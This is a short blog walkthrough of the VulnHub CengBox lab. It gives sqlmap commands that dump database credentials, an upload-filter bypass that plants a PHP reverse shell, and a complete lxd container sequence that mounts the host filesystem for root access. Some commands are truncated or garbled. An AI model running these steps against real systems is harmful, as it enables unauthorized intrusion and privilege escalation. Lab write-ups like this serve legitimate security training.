VulnHub – CengBox Walkthrough

Scanning the box with nmap –A –T4 –p- –vv

Then scanning with dirb

We got a directory masteradmin, let’s scan it again looking for txt of php files:

We got a login page and adb.php page which means there are databases we can enumerate with sqlmap:

sqlmap -u –forms  –dbs -D cengbox –tables –batch –time-sec=1

sqlmap -u –forms  –dbs -D cengbox –tables -T admin –columns -batch –time-sec=1

sqlmap -u –forms  –dbs -D cengbox -T admin ac-C username,password –dump –batch –time-sec=1

Now we login with these credentials we got:

After login we get an upload service were we can upload a file bu the type of file is CENG file:

So we’re going to change the shell file from shell.php to shell.php.ceng and upload it:

We got a Success, now the file is uploaded to get your listening port ready and open the file and you will get a reverse shell back to your machine:

Home Directory got a user cengover, we login in via ssh using the C3ng0v3R00T1! and we get the user.txt:

OK now the user cengover is part of lxd group where we going to privilege escalate from there:

First on our machine we put these commands:

git clone

cd lxd-alpine-builder


Now a new file is created and we’re going to transfer it to the victim machine and run these commands:

lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz –alias image

lxc image list

lxc init image hacker -c security.privileged=true

lxc config device add hacker mydevice disk source=/ path=/mnt/root recursive=true

lxc start hacker

lxc exec hacker /bin/sh

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s